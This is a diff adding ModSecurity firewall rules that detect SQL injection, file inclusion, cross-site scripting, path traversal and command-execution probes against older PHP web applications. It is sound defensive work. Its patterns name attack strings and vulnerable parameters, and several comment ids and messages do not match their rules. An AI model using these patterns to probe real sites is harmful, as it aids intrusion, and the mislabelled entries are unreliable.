+SecRule REQUEST_URI "/index.php?site=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310437,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: All4WWW Homepage Creator index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310439:caught in honeypot
+#SecRule REQUEST_URI "\.php\?(?:do=.*&template=\{\$\{|inc=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310439,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unknown generic PHP remote file inclusion via template substitution attempt'"
+
+
+# Rule 310440:phpMyAdmin path vln
+SecRule REQUEST_URI "/css/phpmyadmin\.css\.php\?globals\[cfg\]\[themepath\]=/etc"         "id:310440,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php local file access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310441:PHP-Nuke Web_Links Multiple Variable SQL Injection
+SecRule REQUEST_URI "modules\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310441,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php SQL injection attempt',chain"
+SecRule ARGS:email|ARGS:ratenum|ARGS:min|ARGS:show|ARGS:orderby|ARGS:url "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310442:phpCOIN SQL injection
+SecRule REQUEST_URI "mod\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310442,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt',chain"
+SecRule ARGS:faq_id|ARGS:id|ARGS:topic_id|ARGS:ord_id|ARGS:dom_id|ARGS:invd_id "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310443:NukeBookmarks  SQL injection
+SecRule REQUEST_URI "modules\.php"         "id:310443,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nukebookmarks modules.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:category "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310444:e107 SQL injection
+SecRule REQUEST_URI "news\.php"         "id:310444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: e107 news.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:list "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310446:PHP-Nuke http Response Splitting vuln
+#SecRule REQUEST_URI "modules\.php\?name=Surveys&pollid=.*&forwarder=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310446,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php http response splitting attempt'"
+
+
+# Rule 310447:AzDGDatingPlatinum view.php id Variable XSS
+#SecRule REQUEST_URI "/view\.php\?l=.*&id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310447,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php cross-site-scripting attempt'"
+
+
+# Rule 310449: AzDGDatingPlatinum view.php id Variable SQL Injection
+#SecRule REQUEST_URI "/view.php\?l=.*&id=.*\'" #        "id:310449,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AzDGDatingPlatinum view.php SQL injection attempt'"
+
+
+# Rule 310450:PHPBB Remote Mod.PHP SQL Injection Vulnerability
+SecRule REQUEST_URI "/moddb/mod\.php"         "chain,id:310450,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB mod.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:id "\'" 
+
+# Rule 310451:CityPost PHP LNKX Input Validation Hole Permits Cross-Site
+# 	Scripting Attacks
+#SecRule REQUEST_URI "/lnkx/message\.php\?msg=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310451,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CityPost PHP LNKX message.php cross-site-scripting attempt'"
+
+
+# Rule 310453:PHP-Nuke Blind SQL Injection
+#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=.*&title=.*&url=.*&description=.*&email=\'\,*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310453,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine index.php cross-site-scripting attempt'"
+
+
+# Rule 310454:PHP-Nuke Blind SQL Injection
+#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=.*&url=\'\,*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310454,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php blind SQL injection attempt'"
+
+
+# Rule 310455:PHP-Nuke Blind SQL Injection
+#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=viewsdownload&min=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*]+(?:from|into|table|database|index|view)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310455,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php blind SQL injection attempt'"
+
+
+# Rule 310456:PHP-Nuke Blind SQL Injection
+#SecRule REQUEST_URI "/modules\.php\?name=downloads&d_op=search&min=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310456,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php blind SQL injection attempt'"
+
+
+# Rule 310457:UBB Thread /ubbthreads/printthread.php SQL Injection Yes/No
+# 	vulnerability
+#SecRule REQUEST_URI "/printthread\.php*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310457,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: UBB Thread printthread.php SQL injection attempt'"
+
+
+# Rule 310458:Coppermine remote file inclusion
+SecRule REQUEST_URI "/theme\.php\?theme_dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310458,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coppermine theme.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310460:phpBB auction Mod SQL injection
+#SecRule REQUEST_URI "/auction_rating\.php\?mode=.*&u=.*\'" #        "id:310460,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB auction_rating.php SQL injection attempt'"
+
+
+# Rule 310461:phpBB auction Mod SQL injection
+#SecRule REQUEST_URI "/auction_offer\.php\?mode=.*&ar=.*\'" #        "id:310461,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB auction_offer.php SQL injection attempt'"
+
+
+# Rule 310462:kali's tagboard remote command execution
+SecRule REQUEST_URI "/admin/banned\.php\?&cmd="         "id:310462,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kalis Tagboard banned.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310463:PHPBB Profile.PHP Cross-Site Scripting Vulnerability
+#SecRule REQUEST_URI "/profile\.php\?mode=viewprofile&u=.*(?:(?:script|script|about|applet|activex|chrome)\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB profile.php cross-site-scripting attempt'"
+
+
+# Rule 310464:PHPBB Viewtopic.PHP Cross-Site Scripting Vulnerability
+#SecRule REQUEST_URI "/viewtopic\.php\?p=.*&highlight=.*(?:(?:script|script|about|applet|activex|chrome)\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310464,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewtopic.php cross-site-scripting attempt'"
+
+
+# Rule 310465:netref Remote Arbitrary File Creation Vulnerability
+SecRule REQUEST_URI "script/cat_for_gen\.php"         "id:310465,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: netref cat_for_gen.php local file creation attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310468: eGroupWare sitemgr-site/index.php category_id Variable XSS
+#SecRule REQUEST_URI "/sitemgr/sitemgr-site/\?category_id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310468,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eGroupWare sitemgr-site/index.php cross-site-scripting attempt'"
+
+
+# Rule 310476:honeypot catch
+SecRule REQUEST_URI "tiki-print\.php\?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "id:310476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-print.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310477: phpBB Notes Mod SQL Injection Vulnerability
+SecRule REQUEST_URI "/posting_notes\.php\?mode=editpost\&*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB notes module posting_notes.php SQL injection attempt'"
+
+
+# Rule 310479:phpCOIN SQL injection attacks
+#SecRule REQUEST_URI "/login\.php\?w=.*&o=.*&phpcoinsessid=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)*\'" #        "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN login.php SQL injection attempt'"
+
+
+# Rule 310480:phpCOIN SQL injection attacks
+SecRule REQUEST_URI "/mod\.php\?mod=siteinfo"         "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310480,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt'"
+SecRule ARGS:id "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)*\'&phpcoinsessid="
+
+
+# Rule 310019:phpCOIN SQL injection attacks
+SecRule REQUEST_URI "/mod\.php\?mod=pages&mode=list&(?:dcat_id|topic_id)=*(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe|select|union)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view|select)*\'\&phpcoinsessid="          "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt'"
+
+
+# Rule 310019: honeypot catch
+#ideabox code injection
+SecRule REQUEST_URI "/ideabox/include\.php"         "id:310482,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ideabox remote include attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI  "(?:dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\?\&(?:cmd|id|inc|name)=)"
+
+
+# Rule 310019: TorrentTrader SQL Injection
+SecRule REQUEST_URI "/download\.php"         "id:310491,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TorrentTrader SQL Injection',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SECRULE ARGS:id "\'"
+
+
+# Rule 310019: honeypot XSS attack
+#SecRule REQUEST_URI "/page\.php\?action=view&id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310495,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic XSS attack'"
+
+
+# Rule 310019: PArser XSS
+#SecRule REQUEST_URI "/parser/parser\.php\?file=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310496,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Parser XSS attack'"
+
+
+# Rule 310019: caught in honeypot
+#SecRule REQUEST_URI "/check_user_id\.php\?user_id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310497,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic XSS attack'"
+
+
+# Rule 310019: JGS-Portal id Variable SQL Injection Vulnerability
+SecRule REQUEST_URI "/jgs_portal\.php\?id=\'"         "id:310499,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JGS-Portal id Variable SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: MyBulletinBoard SQL injection
+SecRule ARGS:tid|ARGS:pid|ARGS:username|ARGS:sid|ARGS:uid|ARGS:fid "'"         "capture,chain,id:390615,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyBulletinBoard SQL injection',logdata:'%{TX.0}',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "/(?:new(?:reply|poll)|editpost|r(?:eputation|atethread)|usercp2|p(?:rintthread|ortal|olls)|showthread|forumdisplay)\.php"
+
+
+# Rule 310019: MyBulletinBoard SQL injection
+SecRule ARGS:usersearch "\%\'"          "capture,chain,id:393615,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyBulletinBoard SQL injection',logdata:'%{TX.0}',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "/memberlist\.php"
+
+
+# Rule 310019: phpBB remote code execution vuln
+
+
+# Rule 310019: downloadProtect "file" Disclosure of Sensitive Information
+SecRule REQUEST_URI "/download\.php\?" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:314001,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: downloadProtect file Disclosure of Sensitive Information Inclusion Vulnerability'"
+SecRule ARGS:file "\.\./"
+
+
+# Rule 310019: phpSecurePages "cfgProgdir" File Inclusion Vulnerability
+SecRule REQUEST_URI "phpSecurePages/secure\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:312119,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSecurePages cfgProgdir File Inclusion Vulnerability'"
+SecRule ARGS:cfgProgdir "(?:\.\./|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+
+# Rule 310019: PHPmyGallery "confdir" File Inclusion Vulnerability
+SecRule REQUEST_URI "/common-tpl-vars\.php"          "chain,id:310492,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPmyGallery confdir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:confdir "(?:\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: Kayako LiveResponse SQL injection
+SecRule REQUEST_URI|REQUEST_BODY "/index\.php\?"         "chain,id:310493,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako LiveResponse SQL injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:date "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
+
+# Rule 310019: phpLDAPadmin welcome.php Arbitrary File Inclusion
+SecRule REQUEST_URI "/welcome\.php\?custom_welcome_page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpLDAPadmin welcome.php Arbitrary File Inclusion',logdata:'%{TX.0}'"
+
+
+# Rule 310019: Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion
+SecRule REQUEST_URI "/comment_delete_cgi\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion',logdata:'%{TX.0}'"
+SecRule ARGS:comment "(?:/|\.\.|config/password\.txt)"
+
+
+# Rule 310019: AutoLinks Pro "alpath" File Inclusion Vulnerability
+SecRule REQUEST_URI "/al_initialize\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380102,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AutoLinks Pro File Inclusion Vulnerability',logdata:'%{TX.0}'"
+SecRule ARGS:alpath "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019: Simple PHP Blog Image File Upload Vulnerability
+SecRule REQUEST_URI "/upload_img_cgi\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Simple PHP Blog Image File Upload Vulnerability ',logdata:'%{TX.0}'"
+SecRule REQUEST_BODY|ARGS "\.php"
+
+
+# Rule 310019: phpWebNotes Include File Error in 'php_api.php'
+SecRule REQUEST_URI "/api\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpWebNotes Include File Error in php_api.php:',logdata:'%{TX.0}'"
+SecRule ARGS:t_path_core "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019: FlatNuke "id" Local File Inclusion Vulnerability
+#SecRule REQUEST_URI "/index\.php" chain
+#SecRule ARGS:id "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019: CMS Made Simple File Inclusion
+SecRule REQUEST_URI "admin/lang\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380105,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CMS Made Simple File Inclusion',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "nls\[file\]\[vx\]\[vxsfx\]" chain
+SecRule REQUEST_URI "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./)"
+
+
+# Rule 310019: Phorum "username" Script Insertion Vulnerability
+SecRule REQUEST_URI "register\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Phorum username Script Insertion Vulnerability',logdata:'%{TX.0}'"
+SecRule ARGS:username "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: SimplePHPBplog vulns
+SecRule REQUEST_URI "/comment_delete_cgi\.php"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "(?:\.\.|/config/password\.txt)" 
+
+# Rule 310019: SimplePHPBplog vulns
+SecRule REQUEST_URI "/images/(?:reset\.php|cmd\.php\?cmd=)"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
+
+
+# Rule 310019: SimplePHPBplog vulns
+#SecRule REQUEST_URI "/upload_img_cgi.php" # "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
+#SecRule REQUEST_BODY "(?:content.*\.php|cmd\.php|reset\.php)"
+
+
+# Rule 310019: SimplePHPBplog vulns
+#SecRule REQUEST_URI "/install03_cgi\.php\?blog_language=english.*[a-z|0-9]" # "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Vulnerability',logdata:'%{TX.0}'"
+
+
+# Rule 310019:  aMember Pro "config['root_dir']" Remote File Inclusion Vulnerabilities
+SecRule REQUEST_URI "(?:/db/mysql/mysql|payment|/efsnet/efsnet|theinternetcommerce/theinternetcommerce|/cdg/cdg|compuworld/compuworld|directone/directone|authorize_aim/authorize_aim|beanstream/beanstream|echo/config|/eprocessingnetwork/eprocessingnetwork|eway/eway|linkpoint/linkpoint|logiccommerce/logiccommerce|netbilling/netbilling|payflow_pro/payflow_pro|paymentsgateway/paymentsgateway|payos/payos|payready/payready|plugnplay/plugnplay)\.inc\.php\?config\[root_dir\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"  "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aMember Pro Remote File Inclusion Vulnerability',logdata:'%{TX.0}'"
+
+
+# Rule 310019: CuteNews Input Validation Hole
+SecRule REQUEST_URI "/cute/data/flood\.db\.php"   "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380112,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CuteNews Input Validation Vulnerability',logdata:'%{TX.0}'"
+
+
+# Rule 310019: PBLang Local File Inclusion and PHP Code Injection
+SecRule REQUEST_URI "/ucp\.php"         "chain,id:380657,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible phpbb blind SQL injection attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\""
+
+
+# Rule 310019: phpMyFAQ vulns
+SecRule REQUEST_URI "/index\.php"         "chain,id:390657,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyFAQ path recusion attack',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:langcode "\.\."
+
+
+# Rule 310019: AlstraSoft E-Friends "mode" File Inclusion Vulnerability
+#SecRule REQUEST_URI "/index\.php" #        "chain,id:390670,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft E-Friends mode File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+#SecRule ARGS:mode "(?:\.\.|/|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: SEO-Board SQL Injection Vulnerability
+SecRule REQUEST_URI "/(?:admin|index)\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390671,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SEO-Board SQL Injection Vulnerability'"
+SecRule ARGS:user_pass_sha1 "(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]"
+
+
+# Rule 310019: CJ LinkOut "123" Cross-Site Scripting Vulnerability
+SecRule REQUEST_URI "/top\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390672,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ LinkOut 123 Cross-Site Scripting Vulnerability'"
+SecRule ARGS:123 "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: jPortal download search SQL Injection Vulnerability
+SecRule REQUEST_URI "/download\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390673,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: jPortal download search SQL Injection Vulnerability'"
+SecRule ARGS:word "(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]"
+
+
+# Rule 310019: CJ Tag Board Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "/details\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390674,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Tag Board Cross-Site Scripting Vulnerabilities'"
+SecRule ARGS:date|ARGS:time|ARGS:name|ARGS:ip|ARGS:agent "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: CJ Tag Board Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "/details\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390675,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CJ Tag Board Cross-Site Scripting Vulnerabilities'"
+SecRule REQUEST_URI "/display\.php" chain
+SecRule ARGS:msg "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: CJ Web2Mail Cross-Site Scripting Vulnerabilities
